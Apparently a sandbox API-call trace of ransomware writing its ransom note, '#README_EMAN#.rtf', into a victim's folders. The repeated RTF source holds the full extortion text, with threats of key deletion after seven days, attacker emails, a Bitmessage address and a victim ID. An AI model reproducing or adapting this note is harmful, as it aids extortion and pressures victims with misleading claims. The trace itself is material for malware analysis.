Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x2460ba8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd.\\par\r\n2. \\f1\\lang1049\\'d3\\'ee\\f0\\lang1033 u must c\\f1\\lang1049\\'ee\\f0\\lang1033 nfirm th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n, r\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd f\\f1\\lang1049\\'ee\\f0\\lang1033 ll\\f1\\lang1049\\'ee\\f0\\lang1033 w th\\f1\\lang1049\\'e5\\f0\\lang1033 instructi\\f1\\lang1049\\'ee\\f0\\lang1033 ns th\\f1\\lang1049\\'e0\\f0\\lang1033 t w\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nt t\\f1\\lang1049\\'ee\\f0\\lang1033 \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u.\\par\r\n3. R\\f1\\lang1049\\'e5\\f0\\lang1033 turn t\\f1\\lang1049\\'ee\\f0\\lang1033 sit\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e0\\f0\\lang1033 nd \\f1\\lang1049\\'f1\\f0\\lang1033 lick \\f1\\lang1049 \"\\f0\\lang1033 L\\f1\\lang1049\\'ee\\f0\\lang1033 gin\\f1\\lang1049 \"\\f0\\lang1033 l\\f1\\lang1049\\'e0\\f0\\lang1033 b\\f1\\lang1049\\'e5\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 r us\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_in }}{\\fldrslt{https://bitmsg.me/users/sign_in\\ul0\\cf0}}}}\\f0\\fs20 , \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033 il \\f1\\lang1049\\'e0\\f0\\lang1033 nd p\\f1\\lang1049\\'e0\\f0\\lang1033 ssw\\f1\\lang1049\\'ee\\f0\\lang1033 rd \\f1\\lang1049\\'e0\\f0\\lang1033 nd click th\\f1\\lang1049\\'e5\\f0\\lang1033 \"Sign in\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n. \\f1\\lang1049 \\f0\\lang1033\\par\r\n4. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"\\f1\\lang1049\\'d1\\f0\\lang1033 r\\f1\\lang1049\\'e5\\'e0\\f0\\lang1033 t\\f1\\lang1049\\'e5\\f0\\lang1033 R\\f1\\lang1049\\'e0\\f0\\lang1033 nd\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss\" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n5. \\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"N\\f1\\lang1049\\'e5\\f0\\lang1033 w m\\f1\\lang1049\\'e0\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\par\r\n\\b 6. S\\f1\\lang1049\\'e5\\f0\\lang1033 nding m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 :\\par\r\nT\\f1\\lang1049\\'ee\\f0\\lang1033 :\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'e0\\f0\\lang1033 ddr\\f1\\lang1049\\'e5\\f0\\lang1033 ss: \\b BM-2cXRWRW5Jv5hxbhgu2HJSJrtPf92iKshhm\\par\r\n\r\n\\pard\\sl240\\slmult1 Subj\\f1\\lang1049\\'e5\\'f1\\f0\\lang1033 t:\\b0 \\f1\\lang1049\\'c5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 r \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 ur ID: \\b 460F9943EA70F103\\par\r\nM\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 : \\b0 D\\f1\\lang1049\\'e5\\f0\\lang1033 scrib\\f1\\lang1049\\'e5\\f0\\lang1033 wh\\f1\\lang1049\\'e0\\f0\\lang1033 t \\f1\\lang1049\\'f3\\'ee\\f0\\lang1033 u think n\\f1\\lang1049\\'e5\\f0\\lang1033 c\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 r\\f1\\lang1049\\'f3\\f0\\lang1033 .\\par\r\n\r\n\\pard\\ri-74\\sa200\\sl240\\slmult1\\tx8378\\f1\\lang1049\\'d1\\f0\\lang1033 lick th\\f1\\lang1049\\'e5\\f0\\lang1033 \"S\\f1\\lang1049\\'e5\\f0\\lang1033 nd m\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 \" butt\\f1\\lang1049\\'ee\\f0\\lang1033 n.\\cf5\\b\\par\r\n\r\n\\pard\\sa200\\sl240\\slmult1\\fs28 GCMD9HhH\\cf0\\f1\\fs32\\lang1049\\par\r\n\\par\r\n}\r\n", lpUsedDefaultChar=0x0) returned 8717 [0286.484] WriteFile (in: hFile=0x2f0, lpBuffer=0x2460ba8*, nNumberOfBytesToWrite=0x220d, lpNumberOfBytesWritten=0x374fdb4, lpOverlapped=0x0 | out: lpBuffer=0x2460ba8*, lpNumberOfBytesWritten=0x374fdb4*=0x220d, lpOverlapped=0x0) returned 1 [0286.484] CloseHandle (hObject=0x2f0) returned 1 [0286.485] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\#readme_eman#.rtf")) returned 0xffffffff [0286.485] GetLastError () returned 0x2 [0286.485] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\#README_EMAN#.rtf" (normalized: "c:\\users\\ciihmnxmn6ps\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\sr\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0286.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0286.488] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 